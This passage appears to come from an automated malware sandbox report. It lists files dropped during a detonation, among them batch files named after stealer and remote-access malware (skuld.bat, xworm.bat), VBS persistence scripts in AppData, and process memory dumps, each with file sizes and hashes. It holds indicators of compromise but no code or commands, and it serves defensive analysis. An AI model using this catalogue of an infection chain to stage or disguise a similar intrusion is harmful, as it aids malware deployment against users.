                                                0cfd3a5f047f855186fb03cab9f1ae7595225a1568061a03f14880e5093b82dda05729af4289b6572c833a192bf512fcf6d3901f066666ea3fda248d379ca0de

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                21KB

                                                MD5

                                                a5c46224f3aa8c927796932b28d119b4

                                                SHA1

                                                07988cd548792010638e409431cfd55fbd16ce72

                                                SHA256

                                                2e9554fcb56fa5bbf482a3974ff32a7c7d55ea0bb619bcb1a132d5cacc5f88e8

                                                SHA512

                                                8a51e69ebfba35973671060be512dc0f4018d871626168379d191366a4ccc878514209914fa343d0fe92052a78b53ee9333d948c647eaee3ef4e2e5d75c62b63

                                              • C:\Users\Admin\AppData\Local\Temp\Log.tmp

                                                Filesize

                                                62B

                                                MD5

                                                48a4d8d2f59528ab75380faa39981ca7

                                                SHA1

                                                aaba2693e7c957bcdf02b95c96348f57dfde0da6

                                                SHA256

                                                7dc95e5d061697cc48611533328a01f7a69981ff6bd4c86581c98df867a558a2

                                                SHA512

                                                ae8e0f246aab54ebad63bde7dd3594673f92ecd560d047e68a01a731fcb4efbc5625ea36b6b4f0ed90647cae9ed4c8744df0fdf6c4a2c28a467382f29a71616e

                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracker.bat

                                                Filesize

                                                422B

                                                MD5

                                                28194258aa09be52f6767e389194ef1d

                                                SHA1

                                                d7ede25b3ebd83a084cff22ae1ad4f7612a99eb0

                                                SHA256

                                                f02fe5951dc207722da607c087c4222067df5ca126687541f3736130e166efbc

                                                SHA512

                                                eec2fc47c9fa340c17a3ff5fb5ffe0abe3ffe1966da131435ca9bcd9b100f2cacf60039969ee4f8e8ea0340d74b8772f9205e57b9a2c83bfdd2ea49c7e5b741c

                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat

                                                Filesize

                                                12.8MB

                                                MD5

                                                189e42d1a681c3b07c7f92d247c214b0

                                                SHA1

                                                8b96bb15ccb0d433b07b5eadeb5e2a05157d5d99

                                                SHA256

                                                ba7e850b945f72b85cd39d8fc5f6571962ccdfbba5fbda12fc2794b241dce9fd

                                                SHA512

                                                d2acb262d4c1b5fcd63950b3c6928701d6a3314d63e63a243e2df8908b746d7649bf8d3b2b6dd0dc6f39c483bead6516260a7d1e201685eef112134833a95e24

                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat

                                                Filesize

                                                74B

                                                MD5

                                                b3be17a14609d812602af67da8b7acc2

                                                SHA1

                                                e1fcc3e3989ee6846694eba252622a336ce63795

                                                SHA256

                                                f6cb1a4b508b1650cc1eaa607f545e50967157eef4f676de39836f2806d63b81

                                                SHA512

                                                780a624a79bb3b293d83017595f709dd9fdc9e645f9c8bc5102aacaaad89a622e6a0dae9ea30fc3679378f6fe4afe34937f4909594c32351ee831917e8b0c1a7

                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat

                                                Filesize

                                                340B

                                                MD5

                                                6943c2eb7e78b8b8cb8171b940de20f2

                                                SHA1

                                                e428c6dc0ffc17ab70178765e0bcb23dc0c12b8a

                                                SHA256

                                                eb79d4bf846dfbd540085f0972658373f26709f281dfb88ad461f9df03d83095

                                                SHA512

                                                1d628f3c5ac6e41ed14cc0069bde0278248e32c77e2e111bc842a71ba62d52913b47fb29402ce79b3d0880b6b5763b0d9906d6fb65bcfdf33103aefa0044552b

                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat

                                                Filesize

                                                155KB

                                                MD5

                                                45f7e10fb33d48463a55c89d40d4824a

                                                SHA1

                                                b95ef1efdb8f79c468cd4cdcd85c8dd54087d9e2

                                                SHA256

                                                7f37dbc61973ca542c89303b1df4f33ccc5ac442a16f497b115236bb58664d2f

                                                SHA512

                                                43ad9acb9e43063a2d83045a24ff24ea7e211c05cdfc2b202f5cf1bd4e73ee9a134802c9aec22e7b941d4eec905055426b313ea30c7a55a6bb2ca467e77325ad

                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nej3pzew.lc0.ps1

                                                Filesize

                                                60B

                                                MD5

                                                d17fe0a3f47be24a6453e9ef58c94641

                                                SHA1

                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                SHA256

                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                SHA512

                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                              • C:\Users\Admin\AppData\Roaming\Windows_Log_172.vbs

                                                Filesize

                                                115B

                                                MD5

                                                b2f9e9363d5230b504c727b66c8f899a

                                                SHA1

                                                ca002f96780145e6bdf6efea6d08a4f3997f4769

                                                SHA256

                                                658a5212102e7582c463120ff34a0873c21dbae015a2e048e36ecdbf9fb4137b

                                                SHA512

                                                04a8c7cc5d73ca21e96de1f88a02a6a4a5a71d74b0b5a47ad376bf0b3dea27ced75036819d0fea8994331fe95150eaff9c6c1fbb8199e8d336b6b378983d4c28

                                              • C:\Users\Admin\AppData\Roaming\Windows_Log_822.vbs

                                                Filesize

                                                115B

                                                MD5

                                                d58fbbe00f10ac2f1c10caeadc86cd35

                                                SHA1

                                                a4c82ac805ab54686f8f14a1f7b28eb6c2675b9f

                                                SHA256

                                                31ba666c8effdfb73401edb4edec3ffad73f847dfab9b2ea32b1476127ffb6f9

                                                SHA512

                                                06ba02dd9bc8bd8cbd09ae073257fd081f6e5b3e30524b73c868a10e78ac50dec70d0ee75c5d0fae7843ec12ebe6aad14a5fb001e0c1c6463da26ec53d325ce9

                                              • memory/1792-151-0x0000000007380000-0x0000000007391000-memory.dmp

                                                Filesize

                                                68KB

                                              • memory/1792-139-0x0000000072620000-0x000000007266C000-memory.dmp

                                                Filesize

                                                304KB

                                              • memory/1792-148-0x0000000007050000-0x00000000070F4000-memory.dmp

                                                Filesize

                                                656KB

                                              • memory/1956-39-0x0000000002780000-0x00000000027B6000-memory.dmp

                                                Filesize

                                                216KB

                                              • memory/1956-63-0x0000000005F10000-0x0000000005F56000-memory.dmp

                                                Filesize

                                                280KB

                                              • memory/1956-62-0x0000000005FF0000-0x000000000603C000-memory.dmp

                                                Filesize

                                                304KB

                                              • memory/1956-61-0x0000000005B30000-0x0000000005B4E000-memory.dmp

                                                Filesize

                                                120KB

                                              • memory/1956-52-0x0000000005750000-0x0000000005AA7000-memory.dmp

                                                Filesize

                                                3.3MB

                                              • memory/1956-124-0x0000000004A70000-0x0000000004A78000-memory.dmp

                                                Filesize

                                                32KB

                                              • memory/1956-40-0x0000000005120000-0x000000000574A000-memory.dmp

                                                Filesize

                                                6.2MB

                                              • memory/1956-126-0x0000000031C80000-0x0000000032620000-memory.dmp

                                                Filesize

                                                9.6MB

                                              • memory/3148-185-0x0000000007FC0000-0x0000000008052000-memory.dmp

                                                Filesize

                                                584KB

                                              • memory/3148-186-0x0000000008090000-0x000000000809A000-memory.dmp

                                                Filesize

                                                40KB

                                              • memory/3148-137-0x0000000007D90000-0x0000000007DA0000-memory.dmp

                                                Filesize

                                                64KB

                                              • memory/3148-138-0x0000000007E40000-0x0000000007EDC000-memory.dmp

                                                Filesize

                                                624KB

                                              • memory/4128-41-0x0000000005AA0000-0x0000000005AC2000-memory.dmp

                                                Filesize

                                                136KB

                                              • memory/4128-68-0x00000000088D0000-0x0000000008E76000-memory.dmp

                                                Filesize

                                                5.6MB

                                              • memory/4128-42-0x0000000005C40000-0x0000000005CA6000-memory.dmp

                                                Filesize

                                                408KB

                                              • memory/4128-43-0x0000000005CB0000-0x0000000005D16000-memory.dmp

                                                Filesize

                                                408KB

                                              • memory/4128-65-0x0000000007BF0000-0x0000000007C0A000-memory.dmp

                                                Filesize

                                                104KB

                                              • memory/4128-64-0x0000000008250000-0x00000000088CA000-memory.dmp

                                                Filesize

                                                6.5MB

                                              • memory/4128-66-0x0000000007C20000-0x0000000007C28000-memory.dmp

                                                Filesize

                                                32KB

                                              • memory/4128-67-0x0000000007C50000-0x0000000007C70000-memory.dmp

                                                Filesize

                                                128KB

                                              • memory/4656-89-0x0000000007AE0000-0x0000000007B84000-memory.dmp

                                                Filesize

                                                656KB

                                              • memory/4656-79-0x0000000072620000-0x000000007266C000-memory.dmp

                                                Filesize

                                                304KB

                                              • memory/4656-78-0x0000000006EA0000-0x0000000006ED4000-memory.dmp

                                                Filesize

                                                208KB

                                              • memory/4656-88-0x0000000007AC0000-0x0000000007ADE000-memory.dmp

                                                Filesize

                                                120KB

                                              • memory/4656-92-0x0000000007E30000-0x0000000007E41000-memory.dmp

                                                Filesize

                                                68KB

                                              • memory/4656-90-0x0000000007C90000-0x0000000007C9A000-memory.dmp

                                                Filesize

                                                40KB

                                              • memory/4656-91-0x0000000007EA0000-0x0000000007F36000-memory.dmp

                                                Filesize

                                                600KB